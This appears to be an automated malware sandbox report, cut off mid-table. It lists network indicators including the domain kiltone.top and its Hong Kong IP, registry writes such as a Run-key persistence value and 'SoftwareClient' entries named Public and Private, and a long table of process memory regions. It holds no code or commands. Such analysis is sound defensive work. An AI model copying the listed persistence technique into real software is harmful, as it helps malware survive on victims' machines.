https://account.bellmedia.c
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239360289361_1Y3IOPY47MV63L7US&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://weibo.com/
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239381138052_1MNXWX7WFZ12D7OBJ&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90
|
150.171.27.10
|
||
http://x1.c.lencr.org/0
|
unknown
|
||
http://x1.i.lencr.org/0
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
https://www.oldmutual.co.za/favicon.ico
|
18.161.69.63
|
||
https://www.reddit.com/
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
https://github.com/mozilla/webcompat-reporter
|
unknown
|
||
https://www.amazon.co.uk/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
https://screenshots.firefox.com/
|
unknown
|
||
file:///C:/Users/user/Downloads/downloaded.pdf
|
|||
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://www.google.com/search?client=firefox-b-d&q=
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.rootca1.amazontrust.com/rootca1.crl0
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
http://ocsp.rootca1.amazontrust.com0:
|
unknown
|
||
https://www.wykop.pl/
|
unknown
|
||
https://twitter.com/
|
unknown
|
||
https://digify.com/a/#/access/logincmd
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.olx.pl/
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://support.mozilla.org/products/firefox
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239360432890_1TOC5U5IB565A9QI0&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://www.amazon.fr/
|
unknown
|
||
http://crt.rootca1.amazontrust.com/rootca1.cer0?
|
unknown
|
||
https://www.google.com/complete/
|
unknown
|
||
https://support.mozilla.org
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239360432892_19VCX0OIIPQAUNJ24&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://www.google.com/
|
unknown
|
||
https://tse1.mm.bing.net/th?id=OADD2.10239360288102_1UBFDLT4HJHZEPK84&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
|
150.171.27.10
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://www.amazon.de/
|
unknown
|
||
https://www.baidu.com/
|
unknown
|
There are 54 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
d12y248af9ueom.cloudfront.net
|
18.161.69.63
|
||
www.google.com
|
142.250.181.132
|
||
kiltone.top
|
45.125.67.168
|
||
www.oldmutual.co.za
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
239.255.255.250
|
unknown
|
Reserved
|
||
45.125.67.168
|
kiltone.top
|
Hong Kong
|
||
18.161.69.63
|
d12y248af9ueom.cloudfront.net
|
United States
|
||
127.0.0.1
|
unknown
|
unknown
|
||
192.168.2.6
|
unknown
|
unknown
|
||
142.250.181.132
|
www.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
XPSUDTARW
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
UID
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Public
|
||
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
|
Private
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWindowsOnlyEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fPasteOriginalEOL
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fReverse
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fWrapAround
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
|
fMatchCase
|
There are 29 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1C76F422000
|
heap
|
page read and write
|
||
203B057A000
|
heap
|
page read and write
|
||
203B0440000
|
heap
|
page read and write
|
||
BCCF000
|
heap
|
page read and write
|
||
38C3C7A000
|
stack
|
page read and write
|
||
7D03FFE000
|
unkown
|
page readonly
|
||
7D0417E000
|
stack
|
page read and write
|
||
A681000
|
heap
|
page read and write
|
||
55A000
|
heap
|
page read and write
|
||
26459200000
|
heap
|
page read and write
|
||
2026AE2A000
|
heap
|
page read and write
|
||
29AC000
|
heap
|
page read and write
|
||
1C76F1F3000
|
heap
|
page read and write
|
||
2026ADB0000
|
trusted library allocation
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
26459313000
|
heap
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
1EC191C2000
|
heap
|
page read and write
|
||
1EF63E3E000
|
heap
|
page read and write
|
||
1EC18CBB000
|
heap
|
page read and write
|
||
27413BC0000
|
heap
|
page read and write
|
||
D260A7E000
|
stack
|
page read and write
|
||
26458B29000
|
heap
|
page read and write
|
||
A789000
|
heap
|
page read and write
|
||
53275FE000
|
stack
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
2645E263000
|
heap
|
page read and write
|
||
1EC191C5000
|
heap
|
page read and write
|
||
A1CC87F000
|
stack
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
BB90000
|
trusted library allocation
|
page read and write
|
||
1EC191C3000
|
heap
|
page read and write
|
||
1F4006F7000
|
heap
|
page read and write
|
||
26458AB1000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1F400720000
|
heap
|
page read and write
|
||
264589E0000
|
trusted library allocation
|
page read and write
|
||
1EF63E37000
|
heap
|
page read and write
|
||
1EC18A54000
|
heap
|
page read and write
|
||
A681000
|
heap
|
page read and write
|
||
1EF63F87000
|
heap
|
page read and write
|
||
1EF63E3E000
|
heap
|
page read and write
|
||
203B0620000
|
heap
|
page read and write
|
||
1C76F1F8000
|
heap
|
page read and write
|
||
BA83000
|
heap
|
page read and write
|
||
CBED77F000
|
stack
|
page read and write
|
||
1EC191C0000
|
heap
|
page read and write
|
||
A1CC51A000
|
stack
|
page read and write
|
||
27413C02000
|
heap
|
page read and write
|
||
EDF4FFE000
|
stack
|
page read and write
|
||
2026AE57000
|
heap
|
page read and write
|
||
2645E030000
|
trusted library allocation
|
page read and write
|
||
566000
|
heap
|
page read and write
|
||
1C76F927000
|
heap
|
page read and write
|
||
1F400C27000
|
heap
|
page read and write
|
||
45E000
|
unkown
|
page readonly
|
||
2567B206000
|
heap
|
page read and write
|
||
1C76F3D0000
|
trusted library allocation
|
page read and write
|
||
1EC18A63000
|
heap
|
page read and write
|
||
38C3EFF000
|
stack
|
page read and write
|
||
274143EC000
|
heap
|
page read and write
|
||
2026AE20000
|
heap
|
page read and write
|
||
1C76F495000
|
heap
|
page read and write
|
||
2645E306000
|
heap
|
page read and write
|
||
21DF55E0000
|
heap
|
page read and write
|
||
7D036FE000
|
unkown
|
page readonly
|
||
274143DE000
|
heap
|
page read and write
|
||
274143D3000
|
heap
|
page read and write
|
||
2567B178000
|
heap
|
page read and write
|
||
1EF63847000
|
heap
|
page read and write
|
||
1EC19008000
|
heap
|
page read and write
|
||
1EF63E3A000
|
heap
|
page read and write
|
||
55D000
|
heap
|
page read and write
|
||
D0E0000
|
trusted library allocation
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
B073000
|
heap
|
page read and write
|
||
1F4007E0000
|
trusted library allocation
|
page read and write
|
||
1C76F490000
|
heap
|
page read and write
|
||
27413BD7000
|
heap
|
page read and write
|
||
42B000
|
unkown
|
page readonly
|
||
2026B3D2000
|
heap
|
page read and write
|
||
1C76F1C3000
|
heap
|
page read and write
|
||
2645E304000
|
heap
|
page read and write
|
||
7D031FE000
|
stack
|
page read and write
|
||
2645931B000
|
heap
|
page read and write
|
||
21DF5399000
|
heap
|
page read and write
|
||
B2B7000
|
heap
|
page read and write
|
||
7D034FE000
|
unkown
|
page readonly
|
||
26458A77000
|
heap
|
page read and write
|
||
A8B2000
|
heap
|
page read and write
|
||
1C76F932000
|
heap
|
page read and write
|
||
1F4006F3000
|
heap
|
page read and write
|
||
1C76F204000
|
heap
|
page read and write
|
||
5A3000
|
heap
|
page read and write
|
||
D26087A000
|
stack
|
page read and write
|
||
2645931A000
|
heap
|
page read and write
|
||
1EF63800000
|
heap
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
26458A00000
|
heap
|
page read and write
|
||
2645E100000
|
remote allocation
|
page read and write
|
||
1F4006C0000
|
heap
|
page read and write
|
||
274143DA000
|
heap
|
page read and write
|
||
1C76F3D0000
|
trusted library allocation
|
page read and write
|
||
1EC18A39000
|
heap
|
page read and write
|
||
1F400C2A000
|
heap
|
page read and write
|
||
203B0640000
|
heap
|
page read and write
|
||
59E000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
26459B80000
|
trusted library section
|
page readonly
|
||
1F400715000
|
heap
|
page read and write
|
||
7D035FC000
|
stack
|
page read and write
|
||
2567B170000
|
heap
|
page read and write
|
||
1C76F210000
|
heap
|
page read and write
|
||
B18C000
|
heap
|
page read and write
|
||
1C76F1F9000
|
heap
|
page read and write
|
||
1EC18A36000
|
heap
|
page read and write
|
||
1C76F42A000
|
heap
|
page read and write
|
||
4C7000
|
heap
|
page read and write
|
||
19D000
|
stack
|
page read and write
|
||
2026AE2A000
|
heap
|
page read and write
|
||
27413C1B000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
274143E0000
|
heap
|
page read and write
|
||
2645E30D000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
1EC1AB20000
|
heap
|
page read and write
|
||
27413D90000
|
trusted library allocation
|
page read and write
|
||
2026AE92000
|
heap
|
page read and write
|
||
1C76F92C000
|
heap
|
page read and write
|
||
26459941000
|
trusted library allocation
|
page read and write
|
||
21DF5340000
|
heap
|
page read and write
|
||
19C4D968000
|
heap
|
page read and write
|
||
1EF63F92000
|
heap
|
page read and write
|
||
27413BB0000
|
trusted library allocation
|
page read and write
|
||
274143D0000
|
heap
|
page read and write
|
||
27413BF7000
|
heap
|
page read and write
|
||
C6CF000
|
heap
|
page read and write
|
||
2645DF90000
|
trusted library allocation
|
page read and write
|
||
1F400715000
|
heap
|
page read and write
|
||
BA8C000
|
heap
|
page read and write
|
||
27413C2B000
|
heap
|
page read and write
|
||
1F4006E9000
|
heap
|
page read and write
|
||
26459302000
|
heap
|
page read and write
|
||
27413D90000
|
trusted library allocation
|
page read and write
|
||
1EC19000000
|
heap
|
page read and write
|
||
CBED67E000
|
stack
|
page read and write
|
||
D2609FE000
|
stack
|
page read and write
|
||
2026AE25000
|
heap
|
page read and write
|
||
1EF63F92000
|
heap
|
page read and write
|
||
586000
|
heap
|
page read and write
|
||
2645E290000
|
heap
|
page read and write
|
||
2026ADF0000
|
heap
|
page read and write
|
||
27413C12000
|
heap
|
page read and write
|
||
9D7000
|
heap
|
page read and write
|
||
1EC191CA000
|
heap
|
page read and write
|
||
274143E8000
|
heap
|
page read and write
|
||
38C3D7F000
|
stack
|
page read and write
|
||
26458A72000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
27413C14000
|
heap
|
page read and write
|
||
1EC18A49000
|
heap
|
page read and write
|
||
A783000
|
heap
|
page read and write
|
||
29C3000
|
heap
|
page read and write
|
||
2645E300000
|
heap
|
page read and write
|
||
274143D4000
|
heap
|
page read and write
|
||
A78F000
|
heap
|
page read and write
|
||
1EC18930000
|
heap
|
page read and write
|
||
2567B226000
|
heap
|
page read and write
|
||
1EF6383B000
|
heap
|
page read and write
|
||
21DF5374000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
21DF5369000
|
heap
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
1EF63817000
|
heap
|
page read and write
|
||
A1CC9FE000
|
stack
|
page read and write
|
||
26458B13000
|
heap
|
page read and write
|
||
2567B202000
|
heap
|
page read and write
|
||
27413BD7000
|
heap
|
page read and write
|
||
BCC0000
|
trusted library allocation
|
page read and write
|
||
1C76F1F9000
|
heap
|
page read and write
|
||
A1CC8FF000
|
stack
|
page read and write
|
||
1EF63A30000
|
trusted library allocation
|
page read and write
|
||
203B0598000
|
heap
|
page read and write
|
||
203B2260000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
2830000
|
heap
|
page read and write
|
||
2645DFBE000
|
trusted library allocation
|
page read and write
|
||
2026AD70000
|
heap
|
page read and write
|
||
1EF63E3B000
|
heap
|
page read and write
|
||
A786000
|
heap
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
434507D000
|
stack
|
page read and write
|
||
2567B209000
|
heap
|
page read and write
|
||
1C76F42E000
|
heap
|
page read and write
|
||
1F400845000
|
heap
|
page read and write
|
||
274143DB000
|
heap
|
page read and write
|
||
2EB5000
|
heap
|
page read and write
|
||
1F400C2A000
|
heap
|
page read and write
|
||
1EC191C4000
|
heap
|
page read and write
|
||
1EC18A54000
|
heap
|
page read and write
|
||
1C76F211000
|
heap
|
page read and write
|
||
21DF5413000
|
heap
|
page read and write
|
||
1F400D84000
|
heap
|
page read and write
|
||
1F400734000
|
heap
|
page read and write
|
||
26458A8C000
|
heap
|
page read and write
|
||
2026AE2E000
|
heap
|
page read and write
|
||
2645E2C4000
|
heap
|
page read and write
|
||
1F400C2E000
|
heap
|
page read and write
|
||
132CAFE000
|
stack
|
page read and write
|
||
7D0407E000
|
stack
|
page read and write
|
||
1EC18A60000
|
heap
|
page read and write
|
||
A780000
|
trusted library allocation
|
page read and write
|
||
2645DFA0000
|
trusted library allocation
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1EF63E37000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
1F40071E000
|
heap
|
page read and write
|
||
26459B50000
|
trusted library section
|
page readonly
|
||
1C771380000
|
heap
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
1EC18950000
|
heap
|
page read and write
|
||
2645DEE0000
|
trusted library allocation
|
page read and write
|
||
1EC18970000
|
trusted library allocation
|
page read and write
|
||
532757F000
|
stack
|
page read and write
|
||
59D000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
2567B1A1000
|
heap
|
page read and write
|
||
2645E256000
|
heap
|
page read and write
|
||
456000
|
unkown
|
page write copy
|
||
29C5000
|
heap
|
page read and write
|
||
A67A000
|
heap
|
page read and write
|
||
274143DA000
|
heap
|
page read and write
|
||
1EF63E33000
|
heap
|
page read and write
|
||
27413C06000
|
heap
|
page read and write
|
||
1F4007E0000
|
trusted library allocation
|
page read and write
|
||
2645DF60000
|
trusted library allocation
|
page read and write
|
||
42B000
|
unkown
|
page readonly
|
||
2645E302000
|
heap
|
page read and write
|
||
2980000
|
heap
|
page read and write
|
||
19C4D870000
|
heap
|
page read and write
|
||
27413C2B000
|
heap
|
page read and write
|
||
2645E251000
|
heap
|
page read and write
|
||
A8B5000
|
heap
|
page read and write
|
||
1EF63F80000
|
heap
|
page read and write
|
||
EDF56FE000
|
stack
|
page read and write
|
||
2E30000
|
heap
|
page read and write
|
||
2026AE92000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
1EC18A52000
|
heap
|
page read and write
|
||
A786000
|
heap
|
page read and write
|
||
29C0000
|
heap
|
page read and write
|
||
1EF63E3A000
|
heap
|
page read and write
|
||
7D03B7E000
|
stack
|
page read and write
|
||
7D032FE000
|
unkown
|
page readonly
|
||
2300000
|
heap
|
page read and write
|
||
2B9F000
|
stack
|
page read and write
|
||
26459EE0000
|
trusted library allocation
|
page read and write
|
||
22AD000
|
stack
|
page read and write
|
||
D26097F000
|
stack
|
page read and write
|
||
1C76F424000
|
heap
|
page read and write
|
||
1C76F210000
|
heap
|
page read and write
|
||
EDF55FD000
|
stack
|
page read and write
|
||
274143D7000
|
heap
|
page read and write
|
||
2026AD90000
|
heap
|
page read and write
|
||
1EC18A18000
|
heap
|
page read and write
|
||
3A1000
|
unkown
|
page execute read
|
||
27413B60000
|
heap
|
page read and write
|
||
274143F2000
|
heap
|
page read and write
|
||
A676000
|
heap
|
page read and write
|
||
1F400C23000
|
heap
|
page read and write
|
||
2645E0A0000
|
trusted library allocation
|
page read and write
|
||
27413C15000
|
heap
|
page read and write
|
||
573000
|
heap
|
page read and write
|
||
2645E2E7000
|
heap
|
page read and write
|
||
2567B010000
|
heap
|
page read and write
|
||
26458A92000
|
heap
|
page read and write
|
||
A249000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
7D030FE000
|
unkown
|
page readonly
|
||
2026B3C7000
|
heap
|
page read and write
|
||
2026B3D2000
|
heap
|
page read and write
|
||
26459840000
|
trusted library allocation
|
page read and write
|
||
2026B3D4000
|
heap
|
page read and write
|
||
2567CB95000
|
heap
|
page read and write
|
||
7D03AFE000
|
unkown
|
page readonly
|
||
2026AE57000
|
heap
|
page read and write
|
||
2645E319000
|
heap
|
page read and write
|
||
1C76F1E7000
|
heap
|
page read and write
|
||
2026AE86000
|
heap
|
page read and write
|
||
1EC18A09000
|
heap
|
page read and write
|
||
B079000
|
heap
|
page read and write
|
||
1F40071E000
|
heap
|
page read and write
|
||
1F400D78000
|
heap
|
page read and write
|
||
38C3DFE000
|
stack
|
page read and write
|
||
1EC19012000
|
heap
|
page read and write
|
||
1F400C20000
|
heap
|
page read and write
|
||
573000
|
heap
|
page read and write
|
||
1EC18A00000
|
heap
|
page read and write
|
||
2026AE48000
|
heap
|
page read and write
|
||
1F400D70000
|
heap
|
page read and write
|
||
19C4D98B000
|
heap
|
page read and write
|
||
B073000
|
heap
|
page read and write
|
||
27413C00000
|
heap
|
page read and write
|
||
D2608FE000
|
stack
|
page read and write
|
||
D668FD000
|
stack
|
page read and write
|
||
7D040FE000
|
unkown
|
page readonly
|
||
A8BA000
|
heap
|
page read and write
|
||
259C000
|
stack
|
page read and write
|
||
1C76F1EB000
|
heap
|
page read and write
|
||
27413BD2000
|
heap
|
page read and write
|
||
1C76F1B9000
|
heap
|
page read and write
|
||
27413BFB000
|
heap
|
page read and write
|
||
B183000
|
heap
|
page read and write
|
||
1F400C2A000
|
heap
|
page read and write
|
||
2260000
|
heap
|
page read and write
|
||
2ABF000
|
stack
|
page read and write
|
||
A6CC000
|
heap
|
page read and write
|
||
2026AE00000
|
heap
|
page read and write
|
||
26458B02000
|
heap
|
page read and write
|
||
B18F000
|
heap
|
page read and write
|
||
1F4005C0000
|
heap
|
page read and write
|
||
1C76F49B000
|
heap
|
page read and write
|
||
27413BF5000
|
heap
|
page read and write
|
||
1C76F420000
|
heap
|
page read and write
|
||
27A8000
|
heap
|
page read and write
|
||
7D03CFE000
|
unkown
|
page readonly
|
||
274143D7000
|
heap
|
page read and write
|
||
2026AF40000
|
trusted library allocation
|
page read and write
|
||
7D03BFE000
|
unkown
|
page readonly
|
||
1C76F390000
|
heap
|
page read and write
|
||
1EC18CB5000
|
heap
|
page read and write
|
||
19C4DC05000
|
heap
|
page read and write
|
||
21DF540B000
|
heap
|
page read and write
|
||
1C76F1C2000
|
heap
|
page read and write
|
||
19C4DA80000
|
heap
|
page read and write
|
||
27413C1A000
|
heap
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
1F400D77000
|
heap
|
page read and write
|
||
2026AE9C000
|
heap
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
38C3E7E000
|
stack
|
page read and write
|
||
26459B70000
|
trusted library section
|
page readonly
|
||
A673000
|
heap
|
page read and write
|
||
1EF63855000
|
heap
|
page read and write
|
||
27413C02000
|
heap
|
page read and write
|
||
7D03D7E000
|
stack
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
7D03F7E000
|
stack
|
page read and write
|
||
26459A60000
|
trusted library allocation
|
page read and write
|
||
1EF63A9B000
|
heap
|
page read and write
|
||
2026AE2E000
|
heap
|
page read and write
|
||
1EF63910000
|
heap
|
page read and write
|
||
27413EB0000
|
heap
|
page read and write
|
||
A679000
|
heap
|
page read and write
|
||
2567B206000
|
heap
|
page read and write
|
||
1C76F210000
|
heap
|
page read and write
|
||
1F4007E0000
|
trusted library allocation
|
page read and write
|
||
1C76F1F5000
|
heap
|
page read and write
|
||
2567B201000
|
heap
|
page read and write
|
||
27413C12000
|
heap
|
page read and write
|
||
2026AE22000
|
heap
|
page read and write
|
||
27A0000
|
heap
|
page read and write
|
||
2026B3C0000
|
heap
|
page read and write
|
||
1EF63852000
|
heap
|
page read and write
|
||
1EC18970000
|
trusted library allocation
|
page read and write
|
||
1F400C2B000
|
heap
|
page read and write
|
||
7D038FE000
|
unkown
|
page readonly
|
||
26459B40000
|
trusted library section
|
page readonly
|
||
22F0000
|
heap
|
page read and write
|
||
27413C1A000
|
heap
|
page read and write
|
||
1EF63F8C000
|
heap
|
page read and write
|
||
2E90000
|
heap
|
page read and write
|
||
21DF7360000
|
heap
|
page read and write
|
||
2567B1B4000
|
heap
|
page read and write
|
||
255B000
|
stack
|
page read and write
|
||
2567B1A3000
|
heap
|
page read and write
|
||
1EC191CE000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
27413C02000
|
heap
|
page read and write
|
||
27413BB0000
|
trusted library allocation
|
page read and write
|
||
2026AE92000
|
heap
|
page read and write
|
||
1F400720000
|
heap
|
page read and write
|
||
2645DF50000
|
trusted library allocation
|
page read and write
|
||
1F400840000
|
heap
|
page read and write
|
||
132CA7F000
|
stack
|
page read and write
|
||
2645DF90000
|
trusted library allocation
|
page read and write
|
||
2567CB90000
|
heap
|
page read and write
|
||
2026AE78000
|
heap
|
page read and write
|
||
434517F000
|
stack
|
page read and write
|
||
2645E0B0000
|
trusted library allocation
|
page read and write
|
||
A471000
|
heap
|
page read and write
|
||
2645E30A000
|
heap
|
page read and write
|
||
26458AFF000
|
heap
|
page read and write
|
||
7D037FB000
|
stack
|
page read and write
|
||
2E9C000
|
heap
|
page read and write
|
||
27413C05000
|
heap
|
page read and write
|
||
2567B1FA000
|
heap
|
page read and write
|
||
2567B1A8000
|
heap
|
page read and write
|
||
1EF63E34000
|
heap
|
page read and write
|
||
27413BF8000
|
heap
|
page read and write
|
||
19C4F5A0000
|
heap
|
page read and write
|
||
21DF5408000
|
heap
|
page read and write
|
||
274143DA000
|
heap
|
page read and write
|
||
19C4D960000
|
heap
|
page read and write
|
||
1EF63A30000
|
trusted library allocation
|
page read and write
|
||
1EC191CA000
|
heap
|
page read and write
|
||
26458AAC000
|
heap
|
page read and write
|
||
7D044FE000
|
unkown
|
page readonly
|
||
1C76F934000
|
heap
|
page read and write
|
||
1F400C2E000
|
heap
|
page read and write
|
||
45E000
|
unkown
|
page readonly
|
||
276E000
|
stack
|
page read and write
|
||
1C76F1C7000
|
heap
|
page read and write
|
||
1F400720000
|
heap
|
page read and write
|
||
E5FD6EA000
|
stack
|
page read and write
|
||
EDF57FF000
|
stack
|
page read and write
|
||
1EC1900C000
|
heap
|
page read and write
|
||
2E0E000
|
stack
|
page read and write
|
||
315F000
|
unkown
|
page read and write
|
||
38C3CFF000
|
stack
|
page read and write
|
||
2645930C000
|
heap
|
page read and write
|
||
2330000
|
heap
|
page read and write
|
||
1EF639F0000
|
heap
|
page read and write
|
||
2567B1F6000
|
heap
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
26459202000
|
heap
|
page read and write
|
||
29A0000
|
heap
|
page read and write
|
||
27413B90000
|
heap
|
page read and write
|
||
26458A9D000
|
heap
|
page read and write
|
||
1EC19012000
|
heap
|
page read and write
|
||
2567B222000
|
heap
|
page read and write
|
||
2645E2BD000
|
heap
|
page read and write
|
||
2645E040000
|
trusted library allocation
|
page read and write
|
||
26459591000
|
trusted library allocation
|
page read and write
|
||
1EC18A69000
|
heap
|
page read and write
|
||
1EF6383B000
|
heap
|
page read and write
|
||
298A000
|
heap
|
page read and write
|
||
A231000
|
heap
|
page read and write
|
||
EDF58FB000
|
stack
|
page read and write
|
||
2567B203000
|
heap
|
page read and write
|
||
1EC18970000
|
trusted library allocation
|
page read and write
|
||
2026AE23000
|
heap
|
page read and write
|
||
1C76F3D0000
|
trusted library allocation
|
page read and write
|
||
A670000
|
heap
|
page read and write
|
||
2026AE77000
|
heap
|
page read and write
|
||
1C76F3D0000
|
trusted library allocation
|
page read and write
|
||
274143D2000
|
heap
|
page read and write
|
||
A670000
|
trusted library allocation
|
page read and write
|
||
CBED6FE000
